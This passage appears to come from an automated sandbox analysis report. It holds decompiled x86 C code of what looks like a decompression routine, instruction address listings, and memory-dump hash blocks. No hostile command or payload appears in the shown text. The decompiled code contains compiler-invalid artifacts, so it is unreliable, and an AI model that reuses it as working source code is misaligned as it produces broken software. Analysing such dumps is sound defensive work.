                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          												__ebx = __ebx + 8;
                                          												__eflags = __ebx;
                                          											}
                                          											L28:
                                          											__eax =  *(__ebp - 0x40);
                                          											__ebx = 0;
                                          											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                          											 *(__ebp - 0x40) = 0;
                                          											__eflags = __eax;
                                          											__esi[1] = __eax;
                                          											if(__eax == 0) {
                                          												goto L53;
                                          											}
                                          											L29:
                                          											_push(0xa);
                                          											_pop(__eax);
                                          											goto L54;
                                          										case 0xa:
                                          											L30:
                                          											__eflags =  *(__ebp - 0x34);
                                          											if( *(__ebp - 0x34) == 0) {
                                          												goto L182;
                                          											}
                                          											L31:
                                          											__eax =  *(__ebp - 0x2c);
                                          											__eflags = __eax;
                                          											if(__eax != 0) {
                                          												L48:
                                          												__eflags = __eax -  *(__ebp - 0x34);
                                          												if(__eax >=  *(__ebp - 0x34)) {
                                          													__eax =  *(__ebp - 0x34);
                                          												}
                                          												__ecx = __esi[1];
                                          												__eflags = __ecx - __eax;
                                          												__edi = __ecx;
                                          												if(__ecx >= __eax) {
                                          													__edi = __eax;
                                          												}
                                          												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                          												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                          												_t80 =  &(__esi[1]);
                                          												 *_t80 = __esi[1] - __edi;
                                          												__eflags =  *_t80;
                                          												if( *_t80 == 0) {
                                          													L53:
                                          													__eax = __esi[0x145];
                                          													L54:
                                          													 *__esi = __eax;
                                          												}
                                          												goto L180;
                                          											}
                                          											L32:
                                          											__ecx = __esi[0x26e8];
                                          											__edx =  *(__ebp - 0x30);
                                          											__eflags = __edx - __ecx;
                                          											if(__edx != __ecx) {
                                          												L38:
                                          												__esi[0x26ea] = __edx;
                                          												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                          												__edx = __esi[0x26ea];
                                          												__ecx = __esi[0x26e9];
                                          												__eflags = __edx - __ecx;
                                          												 *(__ebp - 0x30) = __edx;
                                          												if(__edx >= __ecx) {
                                          													__eax = __esi[0x26e8];
                                          													__eax = __esi[0x26e8] - __edx;
                                          													__eflags = __eax;
                                          												} else {
                                          													__ecx = __ecx - __edx;
                                          													__eax = __ecx - __edx - 1;
                                          												}
                                          												__edi = __esi[0x26e8];
                                          												 *(__ebp - 0x2c) = __eax;
                                          												__eflags = __edx - __edi;
                                          												if(__edx == __edi) {
                                          													__edx =  &(__esi[0x6e8]);
                                          													__eflags = __edx - __ecx;
                                          													if(__eflags != 0) {
                                          														 *(__ebp - 0x30) = __edx;
                                          														if(__eflags >= 0) {
                                          															__edi = __edi - __edx;
                                          															__eflags = __edi;
                                          															__eax = __edi;
                                          														} else {
                                          															__ecx = __ecx - __edx;
                                          															__eax = __ecx;
                                          														}
                                          														 *(__ebp - 0x2c) = __eax;
                                          													}
                                          												}
                                          												__eflags = __eax;
                                          												if(__eax == 0) {
                                          													goto L183;
                                          												} else {
                                          													goto L48;
                                          												}
                                          											}
                                          											L33:
                                          											__eax = __esi[0x26e9];
                                          											__edi =  &(__esi[0x6e8]);
                                          											__eflags = __eax - __edi;
                                          											if(__eax == __edi) {
                                          												goto L38;
                                          											}
                                          											L34:
                                          											__edx = __edi;
                                          											__eflags = __edx - __eax;
                                          											 *(__ebp - 0x30) = __edx;
                                          											if(__edx >= __eax) {
                                          												__ecx = __ecx - __edx;
                                          												__eflags = __ecx;
                                          												__eax = __ecx;
                                          											} else {
                                          												__eax = __eax - __edx;
                                          												__eax = __eax - 1;
                                          											}
                                          											__eflags = __eax;
                                          											 *(__ebp - 0x2c) = __eax;
                                          											if(__eax != 0) {
                                          												goto L48;
                                          											} else {
                                          												goto L38;
                                          											}
                                          										case 0xb:
                                          											goto L56;
                                          										case 0xc:
                                          											L60:
                                          											__esi[1] = __esi[1] >> 0xa;
                                          											__eax = (__esi[1] >> 0xa) + 4;
                                          											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                          												goto L68;
                                          											}
                                          											goto L61;
                                          										case 0xd:
                                          											while(1) {
                                          												L93:
                                          												__eax = __esi[1];
                                          												__ecx = __esi[2];
                                          												__edx = __eax;
                                          												__eax = __eax & 0x0000001f;
                                          												__edx = __edx >> 5;
                                          												__eax = __edx + __eax + 0x102;
                                          												__eflags = __esi[2] - __eax;
                                          												if(__esi[2] >= __eax) {
                                          													break;
                                          												}
                                          												L73:
                                          												__eax = __esi[0x143];
                                          												while(1) {
                                          													L76:
                                          													__eflags = __ebx - __eax;
                                          													if(__ebx >= __eax) {
                                          														break;
                                          													}
                                          													L74:
                                          													__eflags =  *(__ebp - 0x34);
                                          													if( *(__ebp - 0x34) == 0) {
                                          														goto L182;
                                          													}
                                          													L75:
                                          													__ecx =  *(__ebp - 0x38);
                                          													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                          													__ecx = __ebx;
                                          													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          													__ebx = __ebx + 8;
                                          													__eflags = __ebx;
                                          												}
                                          												L77:
                                          												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                          												__eax = __eax &  *(__ebp - 0x40);
                                          												__ecx = __esi[0x144];
                                          												__eax = __esi[0x144] + __eax * 4;
                                          												__edx =  *(__eax + 1) & 0x000000ff;
                                          												__eax =  *(__eax + 2) & 0x0000ffff;
                                          												__eflags = __eax - 0x10;
                                          												 *(__ebp - 0x14) = __eax;
                                          												if(__eax >= 0x10) {
                                          													L79:
                                          													__eflags = __eax - 0x12;
                                          													if(__eax != 0x12) {
                                          														__eax = __eax + 0xfffffff2;
                                          														 *(__ebp - 8) = 3;
                                          													} else {
                                          														_push(7);
                                          														 *(__ebp - 8) = 0xb;
                                          														_pop(__eax);
                                          													}
                                          													while(1) {
                                          														L84:
                                          														__ecx = __eax + __edx;
                                          														__eflags = __ebx - __eax + __edx;
                                          														if(__ebx >= __eax + __edx) {
                                          															break;
                                          														}
                                          														L82:
                                          														__eflags =  *(__ebp - 0x34);
                                          														if( *(__ebp - 0x34) == 0) {
                                          															goto L182;
                                          														}
                                          														L83:
                                          														__ecx =  *(__ebp - 0x38);
                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                          														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                          														__ecx = __ebx;
                                          														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                          														__ebx = __ebx + 8;
                                          														__eflags = __ebx;
                                          													}
                                          													L85:
                                          													__ecx = __edx;
                                          													__ebx = __ebx - __edx;
                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                          													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                          													__edx =  *(__ebp - 8);
                                          													__ebx = __ebx - __eax;
                                          													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                          													__ecx = __eax;
                                          													__eax = __esi[1];
                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                          													__ecx = __esi[2];
                                          													__eax = __eax >> 5;
                                          													__edi = __eax >> 0x00000005 & 0x0000001f;
                                          													__eax = __eax & 0x0000001f;
                                          													__eax = __edi + __eax + 0x102;
                                          													__edi = __edx + __ecx;
                                          													__eflags = __edx + __ecx - __eax;
                                          													if(__edx + __ecx > __eax) {
                                          														goto L9;
                                          													}
                                          													L86:
                                          													__eflags =  *(__ebp - 0x14) - 0x10;
                                          													if( *(__ebp - 0x14) != 0x10) {
                                          														L89:
                                          														__edi = 0;
                                          														__eflags = 0;
                                          														L90:
                                          														__eax = __esi + 0xc + __ecx * 4;
                                          														do {
                                          															L91:
                                          															 *__eax = __edi;
                                          															__ecx = __ecx + 1;
                                          															__eax = __eax + 4;
                                          															__edx = __edx - 1;
                                          															__eflags = __edx;
                                          														} while (__edx != 0);
                                          														__esi[2] = __ecx;
                                          														continue;
                                          													}
                                          													L87:
                                          													__eflags = __ecx - 1;
                                          													if(__ecx < 1) {
                                          														goto L9;
                                          													}
                                          													L88:
                                          													__edi =  *(__esi + 8 + __ecx * 4);
                                          													goto L90;
                                          												}
                                          												L78:
                                          												__ecx = __edx;
                                          												__ebx = __ebx - __edx;
                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                          												__ecx = __esi[2];
                                          												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                          												__esi[2] = __esi[2] + 1;
                                          											}
                                          											L94:
                                          											__eax = __esi[1];
                                          											__esi[0x144] = __esi[0x144] & 0x00000000;
                                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                          											__edi = __eax;
                                          											__eax = __eax >> 5;
                                          											__edi = __edi & 0x0000001f;
                                          											__ecx = 0x101;
                                          											__eax = __eax & 0x0000001f;
                                          											__edi = __edi + 0x101;
                                          											__eax = __eax + 1;
                                          											__edx = __ebp - 0xc;
                                          											 *(__ebp - 0x14) = __eax;
                                          											 &(__esi[0x148]) = __ebp - 4;
                                          											 *(__ebp - 4) = 9;
                                          											__ebp - 0x18 =  &(__esi[3]);
                                          											 *(__ebp - 0x10) = 6;
                                          											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                          											__eflags =  *(__ebp - 4);
                                          											if( *(__ebp - 4) == 0) {
                                          												__eax = __eax | 0xffffffff;
                                          												__eflags = __eax;
                                          											}
                                          											__eflags = __eax;
                                          											if(__eax != 0) {
                                          												goto L9;
                                          											} else {
                                          												L97:
                                          												__ebp - 0xc =  &(__esi[0x148]);
                                          												__ebp - 0x10 = __ebp - 0x1c;
                                          												__eax = __esi + 0xc + __edi * 4;
                                          												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                          												__eflags = __eax;
                                          												if(__eax != 0) {
                                          													goto L9;
                                          												}
                                          												L98:
                                          												__eax =  *(__ebp - 0x10);
                                          												__eflags =  *(__ebp - 0x10);
                                          												if( *(__ebp - 0x10) != 0) {
                                          													L100:
                                          													__cl =  *(__ebp - 4);
                                          													 *__esi =  *__esi & 0x00000000;
                                          													__eflags =  *__esi;
                                          													__esi[4] = __al;
                                          													__eax =  *(__ebp - 0x18);
                                          													__esi[5] =  *(__ebp - 0x18);
                                          													__eax =  *(__ebp - 0x1c);
                                          													__esi[4] = __cl;
                                          													__esi[6] =  *(__ebp - 0x1c);
                                          													goto L101;
                                          												}
                                          												L99:
                                          												__eflags = __edi - 0x101;
                                          												if(__edi > 0x101) {
                                          													goto L9;
                                          												}
                                          												goto L100;
                                          											}
                                          										case 0xe:
                                          											goto L9;
                                          										case 0xf:
                                          											L175:
                                          											__eax =  *(__ebp - 0x30);
                                          											__esi[0x26ea] =  *(__ebp - 0x30);
                                          											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                          											__ecx = __esi[0x26ea];
                                          											__edx = __esi[0x26e9];
                                          											__eflags = __ecx - __edx;
                                          											 *(__ebp - 0x30) = __ecx;
                                          											if(__ecx >= __edx) {
                                          												__eax = __esi[0x26e8];
                                          												__eax = __esi[0x26e8] - __ecx;
                                          												__eflags = __eax;
                                          											} else {
                                          												__edx = __edx - __ecx;
                                          												__eax = __edx - __ecx - 1;
                                          											}
                                          											__eflags = __ecx - __edx;
                                          											 *(__ebp - 0x2c) = __eax;
                                          											if(__ecx != __edx) {
                                          												L183:
                                          												__edi = 0;
                                          												goto L10;
                                          											} else {
                                          												L179:
                                          												__eax = __esi[0x145];
                                          												__eflags = __eax - 8;
                                          												 *__esi = __eax;
                                          												if(__eax != 8) {
                                          													L184:
                                          													0 = 1;
                                          													goto L10;
                                          												}
                                          												goto L180;
                                          											}
                                          									}
                                          								}
                                          								L181:
                                          								goto L9;
                                          							}
                                          							L70:
                                          							if( *__edi == __eax) {
                                          								goto L72;
                                          							}
                                          							L71:
                                          							__esi[2] = __esi[2] & __eax;
                                          							 *__esi = 0xd;
                                          							goto L93;
                                          						}
                                          					}
                                          				}
                                          				L182:
                                          				_t443 = 0;
                                          				_t446[0x147] =  *(_t448 - 0x40);
                                          				_t446[0x146] = _t425;
                                          				( *(_t448 + 8))[1] = 0;
                                          				goto L11;
                                          			}









                                          0x00406478
                                          0x00406478
                                          0x0040647b
                                          0x0040647e
                                          0x00406481
                                          0x00406483
                                          0x00406485
                                          0x00406488
                                          0x0040648b
                                          0x0040648b
                                          0x0040648b
                                          0x00406492
                                          0x00406492
                                          0x0040649a
                                          0x0040649d
                                          0x004064a0
                                          0x004064a3
                                          0x004064a7
                                          0x004064aa
                                          0x004064ac
                                          0x004064af
                                          0x004064b2
                                          0x004064cc
                                          0x004064cc
                                          0x004064cf
                                          0x00000000
                                          0x00000000
                                          0x004064d5
                                          0x004064d5
                                          0x004064d8
                                          0x004064df
                                          0x00000000
                                          0x004064df
                                          0x004064b4
                                          0x004064b7
                                          0x004064be
                                          0x004064c1
                                          0x00000000
                                          0x00000000
                                          0x004064e7
                                          0x004064e7
                                          0x0040650c
                                          0x0040650c
                                          0x0040650c
                                          0x0040650e
                                          0x00000000
                                          0x00000000
                                          0x004064ec
                                          0x004064ec
                                          0x004064f0
                                          0x00000000
                                          0x00000000
                                          0x004064f6
                                          0x004064f6
                                          0x004064f9
                                          0x004064fc
                                          0x004064ff
                                          0x00406501
                                          0x00406503
                                          0x00406506
                                          0x00406509
                                          0x00406509
                                          0x00406509
                                          0x00406510
                                          0x00406518
                                          0x0040651b
                                          0x0040651e
                                          0x00406520
                                          0x00406523
                                          0x00406523
                                          0x00406525
                                          0x00000000
                                          0x00000000
                                          0x0040652b
                                          0x0040652b
                                          0x0040652e
                                          0x00406533
                                          0x00406535
                                          0x0040653b
                                          0x0040653d
                                          0x00406552
                                          0x00406554
                                          0x00406554
                                          0x0040653f
                                          0x00406545
                                          0x00406547
                                          0x00406549
                                          0x00406549
                                          0x00406556
                                          0x0040655a
                                          0x0040655d
                                          0x00406563
                                          0x00406563
                                          0x00406566
                                          0x00406566
                                          0x00406566
                                          0x00406568
                                          0x00000000
                                          0x00000000
                                          0x0040656e
                                          0x0040656e
                                          0x00406574
                                          0x00406576
                                          0x0040659b
                                          0x0040659e
                                          0x004065a4
                                          0x004065a9
                                          0x004065af
                                          0x004065b5
                                          0x004065b7
                                          0x004065ba
                                          0x004065c3
                                          0x004065c9
                                          0x004065c9
                                          0x004065bc
                                          0x004065be
                                          0x004065c0
                                          0x004065c0
                                          0x004065cb
                                          0x004065d1
                                          0x004065d3
                                          0x004065d6
                                          0x004065d8
                                          0x004065de
                                          0x004065e0
                                          0x004065e2
                                          0x004065e4
                                          0x004065e6
                                          0x004065e9
                                          0x004065f2
                                          0x004065f5
                                          0x004065f5
                                          0x004065eb
                                          0x004065eb
                                          0x004065ee
                                          0x004065ee
                                          0x004065e9
                                          0x004065e0
                                          0x004065f7
                                          0x004065f9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004065f9
                                          0x00406578
                                          0x00406578
                                          0x0040657e
                                          0x00406584
                                          0x00406586
                                          0x00000000
                                          0x00000000
                                          0x00406588
                                          0x00406588
                                          0x0040658a
                                          0x0040658c
                                          0x00406595
                                          0x00406595
                                          0x0040658e
                                          0x0040658e
                                          0x00406591
                                          0x00406591
                                          0x00406597
                                          0x00406599
                                          0x00000000
                                          0x00000000
                                          0x004065ff
                                          0x004065ff
                                          0x00406604
                                          0x00406606
                                          0x00406607
                                          0x00406608
                                          0x00406609
                                          0x0040660f
                                          0x00406612
                                          0x00406615
                                          0x00406618
                                          0x0040661a
                                          0x00406620
                                          0x00406620
                                          0x00406623
                                          0x00406623
                                          0x00406623
                                          0x00406623
                                          0x0040662c
                                          0x00000000
                                          0x00000000
                                          0x00406631
                                          0x00406631
                                          0x00406634
                                          0x00406637
                                          0x00406639
                                          0x004066d0
                                          0x004066d0
                                          0x004066d3
                                          0x004066d5
                                          0x004066d6
                                          0x004066d7
                                          0x004066da
                                          0x00000000
                                          0x004066da
                                          0x0040663f
                                          0x0040663f
                                          0x00406645
                                          0x00406647
                                          0x0040666c
                                          0x0040666f
                                          0x00406675
                                          0x0040667a
                                          0x00406680
                                          0x00406686
                                          0x00406688
                                          0x0040668b
                                          0x00406694
                                          0x0040669a
                                          0x0040669a
                                          0x0040668d
                                          0x0040668f
                                          0x00406691
                                          0x00406691
                                          0x0040669c
                                          0x004066a2
                                          0x004066a4
                                          0x004066a7
                                          0x004066a9
                                          0x004066af
                                          0x004066b1
                                          0x004066b3
                                          0x004066b5
                                          0x004066b7
                                          0x004066ba
                                          0x004066c3
                                          0x004066c6
                                          0x004066c6
                                          0x004066bc
                                          0x004066bc
                                          0x004066bf
                                          0x004066bf
                                          0x004066ba
                                          0x004066b1
                                          0x004066c8
                                          0x004066ca
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004066ca
                                          0x00406649
                                          0x00406649
                                          0x0040664f
                                          0x00406655
                                          0x00406657
                                          0x00000000
                                          0x00000000
                                          0x00406659
                                          0x00406659
                                          0x0040665b
                                          0x0040665d
                                          0x00406664
                                          0x00406664
                                          0x00406666
                                          0x0040665f
                                          0x0040665f
                                          0x00406661
                                          0x00406661
                                          0x00406668
                                          0x0040666a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004066e2
                                          0x004066e2
                                          0x004066e5
                                          0x004066e7
                                          0x004066ea
                                          0x004066ed
                                          0x004066ed
                                          0x004066ed
                                          0x004066ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405d9b
                                          0x00405d7f
                                          0x00000000
                                          0x00405d85
                                          0x00405d88
                                          0x00405d92
                                          0x00405d95
                                          0x00405d98
                                          0x00000000
                                          0x00405d98
                                          0x00405d7f
                                          0x00405da3
                                          0x00405da6
                                          0x00405daa
                                          0x00405db4
                                          0x00405dbe
                                          0x00405dc1
                                          0x00405dc7
                                          0x00405efb
                                          0x00405efd
                                          0x00405f03
                                          0x00405f06
                                          0x00405f09
                                          0x00000000
                                          0x00405f09
                                          0x00405dcd
                                          0x00405dcd
                                          0x00405dce
                                          0x00405e26
                                          0x00405e26
                                          0x00405e2d
                                          0x00405ed3
                                          0x00405ed3
                                          0x00405ed8
                                          0x00405edb
                                          0x00405ee0
                                          0x00405ee3
                                          0x00405ee8
                                          0x00405eeb
                                          0x00405ef0
                                          0x00405ef3
                                          0x00405ef3
                                          0x00000000
                                          0x00405e33
                                          0x00405e33
                                          0x00405e33
                                          0x00405e33
                                          0x00405e37
                                          0x00405e37
                                          0x00405e59
                                          0x00405e5c
                                          0x00405e5e
                                          0x00405e61
                                          0x00405e66
                                          0x00405e3c
                                          0x00405e3c
                                          0x00405e41
                                          0x00405e43
                                          0x00405e45
                                          0x00405e4a
                                          0x00405e50
                                          0x00405e55
                                          0x00405e57
                                          0x00405e57
                                          0x00405e4c
                                          0x00405e4c
                                          0x00405e4c
                                          0x00405e4a
                                          0x00000000
                                          0x00405e68
                                          0x00405e95
                                          0x00405e9a
                                          0x00405e9c
                                          0x00405e9d
                                          0x00405e9f
                                          0x00405ea0
                                          0x00405ea0
                                          0x00405ea0
                                          0x00405ec8
                                          0x00405ecd
                                          0x00405ecd
                                          0x00000000
                                          0x00405ecd
                                          0x00405e66
                                          0x00405e2d
                                          0x00405dd0
                                          0x00405dd0
                                          0x00405dd1
                                          0x00405e1b
                                          0x00000000
                                          0x00405e1b
                                          0x00405dd3
                                          0x00405dd4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405f30
                                          0x00405f30
                                          0x00405f30
                                          0x00405f33
                                          0x00000000
                                          0x00000000
                                          0x00405f10
                                          0x00405f10
                                          0x00405f14
                                          0x00000000
                                          0x00000000
                                          0x00405f1a
                                          0x00405f1a
                                          0x00405f1d
                                          0x00405f20
                                          0x00405f25
                                          0x00405f27
                                          0x00405f2a
                                          0x00405f2d
                                          0x00405f2d
                                          0x00405f2d
                                          0x00405f35
                                          0x00405f35
                                          0x00405f38
                                          0x00405f3a
                                          0x00405f3f
                                          0x00405f42
                                          0x00405f44
                                          0x00405f47
                                          0x00000000
                                          0x00000000
                                          0x00405f4d
                                          0x00405f4d
                                          0x00405f4f
                                          0x00000000
                                          0x00000000
                                          0x00405f55
                                          0x00405f55
                                          0x00405f59
                                          0x00000000
                                          0x00000000
                                          0x00405f5f
                                          0x00405f5f
                                          0x00405f62
                                          0x00405f64
                                          0x00406002
                                          0x00406002
                                          0x00406005
                                          0x00406007
                                          0x00406007
                                          0x0040600a
                                          0x0040600d
                                          0x0040600f
                                          0x00406011
                                          0x00406013
                                          0x00406013
                                          0x0040601c
                                          0x00406021
                                          0x00406024
                                          0x00406027
                                          0x0040602a
                                          0x0040602d
                                          0x0040602d
                                          0x0040602d
                                          0x00406030
                                          0x00406036
                                          0x00406036
                                          0x0040603c
                                          0x0040603c
                                          0x0040603c
                                          0x00000000
                                          0x00406030
                                          0x00405f6a
                                          0x00405f6a
                                          0x00405f70
                                          0x00405f73
                                          0x00405f75
                                          0x00405fa0
                                          0x00405fa3
                                          0x00405fa9
                                          0x00405fae
                                          0x00405fb4
                                          0x00405fba
                                          0x00405fbc
                                          0x00405fbf
                                          0x00405fc8
                                          0x00405fce
                                          0x00405fce
                                          0x00405fc1
                                          0x00405fc3
                                          0x00405fc5
                                          0x00405fc5
                                          0x00405fd0
                                          0x00405fd6
                                          0x00405fd9
                                          0x00405fdb
                                          0x00405fdd
                                          0x00405fe3
                                          0x00405fe5
                                          0x00405fe7
                                          0x00405fea
                                          0x00405ff3
                                          0x00405ff3
                                          0x00405ff5
                                          0x00405fec
                                          0x00405fec
                                          0x00405fef
                                          0x00405fef
                                          0x00405ff7
                                          0x00405ff7
                                          0x00405fe5
                                          0x00405ffa
                                          0x00405ffc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00405ffc
                                          0x00405f77
                                          0x00405f77
                                          0x00405f7d
                                          0x00405f83
                                          0x00405f85
                                          0x00000000
                                          0x00000000
                                          0x00405f87
                                          0x00405f87
                                          0x00405f89
                                          0x00405f8b
                                          0x00405f8e
                                          0x00405f95
                                          0x00405f95
                                          0x00405f97
                                          0x00405f90
                                          0x00405f90
                                          0x00405f92
                                          0x00405f92
                                          0x00405f99
                                          0x00405f9b
                                          0x00405f9e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                          • Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
                                          • Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
                                          • Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction ID: d146f544c4d5cf28aed62a181ac7a0edd9bc0cb025ea2031d8961bd1d2e98751
                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction Fuzzy Hash: F3C1743220519309EB4DD77E847453FFAE29B926F131717AEE4B6CB1C9EE20C564D620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.461522523.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.461509541.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461540942.000000001001A000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.461551096.000000001001F000.00000040.00020000.sdmp
                                          • Associated: 00000004.00000002.461561278.0000000010020000.00000080.00020000.sdmp
                                          • Associated: 00000004.00000002.461594815.0000000010021000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction ID: 8f49d86cfcd63a9e28a291694487fbf7eb841b9f507b9c3a19b01359cf926182
                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                          • Instruction Fuzzy Hash: 6FC14E3220529709FB4D877DC47493FBAE2DB926F131717AEE4B6CB1D8EE20C5649620
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				intOrPtr* _v32;
                                          				signed int* _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				void _v116;
                                          				signed int _v176;
                                          				signed int _v180;
                                          				signed int _v240;
                                          				signed int _t166;
                                          				signed int _t168;
                                          				intOrPtr _t175;
                                          				signed int _t181;
                                          				void* _t182;
                                          				intOrPtr _t183;
                                          				signed int* _t184;
                                          				signed int _t186;
                                          				signed int _t187;
                                          				signed int* _t189;
                                          				signed int _t190;
                                          				intOrPtr* _t191;
                                          				intOrPtr _t192;
                                          				signed int _t193;
                                          				signed int _t195;
                                          				signed int _t200;
                                          				signed int _t205;
                                          				void* _t207;
                                          				short _t208;
                                          				signed char _t222;
                                          				signed int _t224;
                                          				signed int _t225;
                                          				signed int* _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				void* _t235;
                                          				signed int _t236;
                                          				signed int _t244;
                                          				signed int _t246;
                                          				signed int _t251;
                                          				signed int _t254;
                                          				signed int _t256;
                                          				signed int _t259;
                                          				signed int _t262;
                                          				void* _t263;
                                          				void* _t264;
                                          				signed int _t267;
                                          				intOrPtr _t269;
                                          				intOrPtr _t271;
                                          				signed int _t274;
                                          				intOrPtr* _t275;
                                          				unsigned int _t276;
                                          				void* _t277;
                                          				signed int _t278;
                                          				intOrPtr* _t279;
                                          				signed int _t281;
                                          				intOrPtr _t282;
                                          				intOrPtr _t283;
                                          				signed int* _t284;
                                          				signed int _t286;
                                          				signed int _t287;
                                          				signed int _t288;
                                          				signed int _t296;
                                          				signed int* _t297;
                                          				intOrPtr _t298;
                                          				void* _t299;
                                          
                                          				_t278 = _a8;
                                          				_t187 = 0x10;
                                          				memset( &_v116, 0, _t187 << 2);
                                          				_t189 = _a4;
                                          				_t233 = _t278;
                                          				do {
                                          					_t166 =  *_t189;
                                          					_t189 =  &(_t189[1]);
                                          					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                          					_t233 = _t233 - 1;
                                          				} while (_t233 != 0);
                                          				if(_v116 != _t278) {
                                          					_t279 = _a28;
                                          					_t267 =  *_t279;
                                          					_t190 = 1;
